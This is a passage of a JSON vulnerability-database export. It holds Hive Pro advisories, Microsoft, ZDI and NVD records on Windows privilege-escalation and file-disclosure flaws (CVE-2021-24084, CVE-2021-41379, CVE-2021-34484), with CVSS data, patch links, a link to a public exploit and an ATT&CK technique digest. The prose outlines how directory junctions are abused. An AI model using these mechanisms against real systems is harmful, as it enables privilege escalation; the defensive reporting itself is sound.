0patch and will be available for free until Microsoft releases an official patch for the vulnerability.\n\n#### Vulnerability Details\n\n![](https://www.hivepro.com/wp-content/uploads/2021/12/VD-1024x278.png)\n\n#### Patch Link\n\n<https://blog.0patch.com/2021/11/micropatching-unpatched-local-privilege.html>\n\n#### References\n\n<https://threatpost.com/unpatched-windows-zero-day-privileged-file-access/176609/>\n\n<https://thehackernews.com/2021/11/unpatched-unauthorized-file-read.html>\n\n<https://www.techradar.com/sg/news/nasty-windows-10-vulnerability-gets-a-patch-but-not-from-microsoft>", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-12-01T04:26:33", "type": "hivepro", "title": "Microsoft could not patch this vulnerability yet again", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084"], "modified": "2021-12-01T04:26:33", "id": "HIVEPRO:810C0A801A0950878F0BC43C27E1F429", "href": "https://www.hivepro.com/microsoft-could-not-patch-this-vulnerability-yet-again/", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2021-11-26T17:20:32", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here.![](chrome-extension://gmpljdlgcdkljlppaekciacdmdlhfeon/images/beside-link-icon.svg)](<https://www.hivepro.com/wp-content/uploads/2021/11/Microsoft-could-not-patch-this-vulnerability_TA202150-1.pdf>)[](<https://docs.google.com/viewer?url=https%3A%2F%2Fwww.hivepro.com%2Fwp-content%2Fuploads%2F2021%2F11%2FMicrosoft-could-not-patch-this-vulnerability_TA202150-1.pdf&embedded=true&chrome=false&dov=1> \"View this pdf file\" )\n\nMicrosoft released patches for 44 vulnerabilities on November 9th. CVE-2021-41379 was among them. However, installing this patch does not completely eliminate the vulnerability.\n\nAn [exploit](<https://github.com/klinix5/InstallerFileTakeOver>) for a new Windows zero-day local privilege elevation vulnerability that grants admin privileges in Windows 10, Windows 11, and Windows Server has been publicly disclosed by a security researcher, [Abdelhamid Naceri](<https://github.com/klinix5/>).\n\nCVE-2021-41379 is a privilege escalation vulnerability that allows an attacker with limited access on a compromised system to move laterally within the same network. All the versions of Windows 10, Windows 11 and Windows server are affected by this vulnerability.\n\nAfter examining Microsoft's fix,, the security researcher who discovered this vulnerability, discovered a bypass of the patch as well as a more powerful new zero-day privilege elevation vulnerability.\n\nThere are currently no workarounds for this vulnerability. Any attempt to directly patch the binary will result in a failure of the Windows installer. We must wait for Microsoft to resolve this issue.\n\n#### Vulnerability Details\n\n![](https://www.hivepro.com/wp-content/uploads/2021/11/VD-1-1024x485.png)\n\n#### References\n\n<https://www.bleepingcomputer.com/news/microsoft/new-windows-zero-day-with-public-exploit-lets-you-become-an-admin/>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-41379>", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-23T10:56:28", "type": "hivepro", "title": "Microsoft could not patch this vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379"], "modified": "2021-11-23T10:56:28", "id": "HIVEPRO:152F6F7B9557DB47003F4F65E73BCF44", "href": "https://www.hivepro.com/microsoft-could-not-patch-this-vulnerability/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-25T14:28:59", "description": "THREAT LEVEL: Amber. For a detailed advisory, download the pdf file here After seven months, a vulnerability that was addressed in August 2021 patch Tuesday remained unpatched. This locally exploited vulnerability is tracked as CVE-2021-34484 and affects the Windows User Profile Service. While Proof-of-concept is been available for some time now, it is not been actively exploited in the wild. This Elevation of Privilege vulnerability was found by renowned researcher Abdelhamid Naceri and reported to Microsoft, which addressed it in their August 2021 release. Naceri noted that Microsoft's fix was incomplete soon after it was issued and presented a proof of concept (POC) that bypassed it on all Windows versions. That is when the 0patch team, published an unofficial security update for all Windows versions and made it available for free download to all registered users. Microsoft then patched this security flaw in their January 2022 release, tracking it as CVE-2022-21919. Naceri, on the other hand, discovered a way around this second patch. However, Microsoft's second attempt to fix the bug altered the "profext.dll" file, resulting in the removal of the unofficial workaround of 0patch from everyone who had installed the January 2022 Windows updates. Organizations could apply the 0patch unofficial patch to patch this vulnerability using the steps given below: 1. Update Windows 10 to the latest March 2022 patch.2. Create a free account in 0patch Central3. Install and register the 0patch Agent4. An automated micro-patching process will initiate to apply this patch. Potential MITRE ATT&CK TTPs are: TA0042: Resource DevelopmentT1588: Obtain CapabilitiesT1588.006: Obtain Capabilities: VulnerabilitiesTA0001: Initial AccessT1190: Exploit Public-Facing ApplicationTA0004: Privilege EscalationT1068: Exploitation for Privilege EscalationTA0005: Defense Evasion T1548: Abuse Elevation Control Mechanism Vulnerability Details References https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21919 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34484 https://www.bleepingcomputer.com/news/microsoft/windows-zero-day-flaw-giving-admin-rights-gets-unofficial-patch-again/ https://blog.0patch.com/2022/03/a-bug-that-doesnt-want-to-die-cve-2021.html", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-25T13:56:19", "type": "hivepro", "title": "Microsoft\u2019s privilege escalation vulnerability that refuses to go away", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-21919"], "modified": "2022-03-25T13:56:19", "id": "HIVEPRO:98B56CB60C0C2B248824B5ECAE47E387", "href": "https://www.hivepro.com/microsofts-privilege-escalation-vulnerability-that-refuses-to-go-away/", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-30T07:42:21", "description": "For a detailed threat digest, download the pdf file here Published Vulnerabilities Interesting Vulnerabilities Active Threat Groups Targeted Countries Targeted Industries ATT&CK TTPs 340 10 5 53 24 84 The fourth week of March 2022 witnessed the discovery of 340 vulnerabilities out of which 10 gained the attention of Threat Actors and security researchers worldwide. Among these 10, there was 1 which is undergoing reanalysis, and 2 were not present in the NVD at all. Hive Pro Threat Research Team has curated a list of 10 CVEs that require immediate action. Furthermore, we also observed five threat actor groups being highly active in the last week. The Lapsus$, a new extortion threat actor group had attacked popular organizations such as Brazilian Ministry of Health, NVIDIA, Samsung, Vodafone, Ubisoft, Octa, and Microsoft for data theft and destruction, was observed using the Redline info-stealer. Additionally, North Korean state hackers known as Lazarus group, was exploiting the zero-day vulnerability in Google Chrome's web browser (CVE-2022-0609). AvosLocker is a Ransomware as a Service (RaaS) affiliate-based group that has targeted 50+ organizations is currently exploiting Proxy Shell vulnerabilities (CVE-2021-31206, CVE-2021-31207, CVE-2021-34523, CVE-2021-34473, CVE-2021-26855). The threat actor APT35 aka Magic Hound, an Iranian-backed threat group is exploiting the Proxy Shell vulnerabilities to attack organizations across the globe. Another South Korean APT group DarkHotel was targeting the hospitality industry in China. Common TTPs which could potentially be exploited by these threat actors or CVEs can be found in the detailed section below. Detailed Report: Interesting Vulnerabilities: Vendor CVEs Patch Link CVE-2021-34484 CVE-2022-21919 https://central.0patch.com/auth/login CVE-2022-0609* CVE-2022-1096* https://www.google.com/intl/en/chrome/?standalone=1 CVE-2021-31206 CVE-2021-31207 CVE-2021-34523 CVE-2021-34473 CVE-2021-26855 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31206 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855 CVE-2022-0543 https://security-tracker.debian.org/tracker/CVE-2022-0543 Active Actors: Icon Name Origin Motive APT 35 (Magic Hound, Cobalt Illusion, Charming Kitten, TEMP.Beanie, Timberworm, Tarh Andishan, TA453, ITG18, Phosphorus, Newscaster) Iran Information theft and espionage AvosLocker Unknown Ecrime, Information theft, and Financial gain Lazarus Group (Labyrinth Chollima, Group 77, Hastati Group, Whois Hacking Team, NewRomanic Cyber Army Team, Zinc, Hidden Cobra, Appleworm, APT-C-26, ATK 3, SectorA01, ITG03) North Korea Information theft and espionage, Sabotage and destruction, Financial crime Lapsus$ (DEV-0537) Unknown Data theft and Destruction DarkHotel (APT-C-06, SIG25, Dubnium, Fallout Team, Shadow Crane, CTG-1948, Tungsten Bridge, ATK 52, Higaisa, TAPT-02, Luder) South Korea Information theft and espionage Targeted Location: Targeted Sectors: Common TTPs: TA0042: Resource Development TA0001: Initial Access TA0002: Execution TA0003: Persistence TA0004: Privilege Escalation TA0005: Defense Evasion TA0006: Credential Access TA0007: Discovery TA0008: Lateral Movement TA0009: Collection TA0011: Command and Control TA0010: Exfiltration TA0040: Impact T1583: Acquire Infrastructure T1189: Drive-by Compromise T1059: Command and Scripting Interpreter T1098: Account Manipulation T1548: Abuse Elevation Control Mechanism T1548: Abuse Elevation Control Mechanism T1110: Brute Force T1010: Application Window Discovery T1021: Remote Services T1560: Archive Collected Data T1071: Application Layer Protocol T1048: Exfiltration Over Alternative Protocol T1485: Data Destruction T1583.001: Domains T1190: Exploit Public-Facing Application T1059.001: PowerShell T1547: Boot or Logon Autostart Execution T1134: Access Token Manipulation T1134: Access Token Manipulation T1110.003: Password Spraying T1083: File and Directory Discovery T1021.001: Remote Desktop Protocol T1560.003: Archive via Custom Method T1071.001: Web Protocols T1048.003: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol T1486: Data Encrypted for Impact T1583.006: Web Services T1133: External Remote Services T1059.005: Visual Basic T1547.006: Kernel Modules and Extensions T1134.002: Create Process with Token T1134.002: Create Process with Token T1056: Input Capture T1120: Peripheral Device Discovery T1021.002: SMB/Windows Admin Shares T1560.002: Archive via Library T1132: Data Encoding T1041: Exfiltration Over C2 Channel T1491: Defacement T1587: Develop Capabilities T1566: Phishing T1059.004: Unix Shell T1547.001: Registry Run Keys / Startup Folder T1547: Boot or Logon Autostart Execution T1564: Hide Artifacts T1056.004: Credential API Hooking T1057: Process Discovery T1021.004: SSH T1213: Data from Information Repositories T1132.001: Standard Encoding T1537: Transfer Data to Cloud Account T1491.001: Internal Defacement T1587.001: Malware T1566.001: Spearphishing Attachment T1059.003: Windows Command Shell T1547.009: Shortcut Modification T1547.006: Kernel Modules and Extensions T1564.001: Hidden Files and Directories T1056.001: Keylogging T1012: Query Registry T1005: Data from Local System T1001: Data Obfuscation T1561: Disk Wipe T1588: Obtain Capabilities T1199: Trusted Relationship T1203: Exploitation for Client Execution T1543: Create or Modify System Process T1547.001: Registry Run Keys / Startup Folder T1562: Impair Defenses T1003: OS Credential Dumping T1082: System Information Discovery T1074: Data Staged T1001.003: Protocol Impersonation T1561.001: Disk Content Wipe T1588.004: Digital Certificates T1078: Valid Accounts T1106: Native API T1543.003: Windows Service T1547.009: Shortcut Modification T1562.004: Disable or Modify System Firewall T1111: Two-Factor Authentication Interception T1016: System Network Configuration Discovery T1074.001: Local Data Staging T1573: Encrypted Channel T1561.002: Disk Structure Wipe T1588.006: Vulnerabilities T1053: Scheduled Task/Job T1133: External Remote Services T1543: Create or Modify System Process T1562.001: Disable or Modify Tools T1552: Unsecured Credentials T1033: System Owner/User Discovery T1056: Input Capture T1573.001: Symmetric Cryptography T1490: Inhibit System Recovery T1204: User Execution T1137: Office Application Startup T1543.003: Windows Service T1070: Indicator Removal on Host T1124: System Time Discovery T1056.004: Credential API Hooking T1008: Fallback Channels T1489: Service Stop T1204.002: Malicious File T1542: Pre-OS Boot T1068: Exploitation for Privilege Escalation T1070.004: File Deletion T1056.001: Keylogging T1105: Ingress Tool Transfer T1529: System Shutdown/Reboot T1047: Windows Management Instrumentation T1542.003: Bootkit T1055: Process Injection T1070.006: Timestomp T1571: Non-Standard Port T1053: Scheduled Task/Job T1055.001: Dynamic-link Library Injection T1036: Masquerading T1090: Proxy T1505: Server Software Component T1053: Scheduled Task/Job T1036.005: Match Legitimate Name or Location T1090.002: External Proxy T1505.003: Web Shell T1078: Valid Accounts T1027: Obfuscated Files or Information T1078: Valid Accounts T1027.006: HTML Smuggling T1027.002: Software Packing T1542: Pre-OS Boot T1542.003: Bootkit T1055: Process Injection T1055.001: Dynamic-link Library Injection T1218: Signed Binary Proxy Execution T1218.001: Compiled HTML File T1078: Valid Accounts T1497: Virtualization/Sandbox Evasion Threat Advisories: Microsoft\u2019s privilege escalation vulnerability that refuses to go away Google Chrome\u2019s second zero-day in 2022 Magic Hound Exploiting Old Microsoft Exchange ProxyShell Vulnerabilities AvosLocker Ransomware group has targeted 50+ Organizations Worldwide North Korean state-sponsored threat actor Lazarus Group exploiting Chrome Zero-day vulnerability LAPSUS$ \u2013 New extortion group involved in the breach against Nvidia, Microsoft, Okta and Samsung DarkHotel APT group targeting the Hospitality Industry in China New Threat Actor using Serpent Backdoor attacking French Entities Muhstik botnet adds another vulnerability exploit to its arsenal", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-29T13:56:10", "type": "hivepro", "title": "Weekly Threat Digest: 21 \u2013 27 March 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-31206", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34484", "CVE-2021-34523", "CVE-2022-0543", "CVE-2022-0609", "CVE-2022-1096", "CVE-2022-21919"], "modified": "2022-03-29T13:56:10", "id": "HIVEPRO:E7F36EC1E4DCF018F94ECD22747B7093", "href": "https://www.hivepro.com/weekly-threat-digest-21-27-march-2022/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2023-06-14T15:26:31", "description": "Windows Mobile Device Management Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-02-09T08:00:00", "type": "mscve", "title": "Windows Mobile Device Management Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084"], "modified": "2021-12-14T08:00:00", "id": "MS:CVE-2021-24084", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-24084", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-07-28T21:46:37", "description": "Windows Installer Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-09T08:00:00", "type": "mscve", "title": "Windows Installer Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379"], "modified": "2021-11-09T08:00:00", "id": "MS:CVE-2021-41379", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-41379", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:25:12", "description": "Windows User Profile Service Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T07:00:00", "type": "mscve", "title": "Windows User Profile Service Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484"], "modified": "2021-08-10T07:00:00", "id": "MS:CVE-2021-34484", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34484", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "zdi": [{"lastseen": "2023-05-27T15:51:57", "description": "This vulnerability allows local attackers to disclose sensitive information on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the Device Management Enrollment Service. By creating a directory junction, an attacker can abuse the Device Management Enrollment Service to disclose the contents of arbitrary files. An attacker can leverage this vulnerability to disclose information in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-02-10T00:00:00", "type": "zdi", "title": "Microsoft Windows Device Management Enrollment Service Directory Junction Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084"], "modified": "2021-02-10T00:00:00", "id": "ZDI-21-178", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-178/", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-05-23T15:46:59", "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the Windows Installer service. By creating a junction, an attacker can abuse the service to delete a file or directory. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-11T00:00:00", "type": "zdi", "title": "Microsoft Windows Installer Service Link Following Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379"], "modified": "2021-11-11T00:00:00", "id": "ZDI-21-1308", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T15:49:08", "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the User Profile Service. By creating a directory junction, an attacker can abuse the service to delete a directory. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-11T00:00:00", "type": "zdi", "title": "Microsoft Windows User Profile Service Directory Junction Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484"], "modified": "2021-08-11T00:00:00", "id": "ZDI-21-966", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-966/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-05-27T14:26:15", "description": "Windows Mobile Device Management Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-02-25T23:15:00", "type": "cve", "title": "CVE-2021-24084", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084"], "modified": "2022-06-28T14:11:00", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:2004"], "id": "CVE-2021-24084", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24084", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", 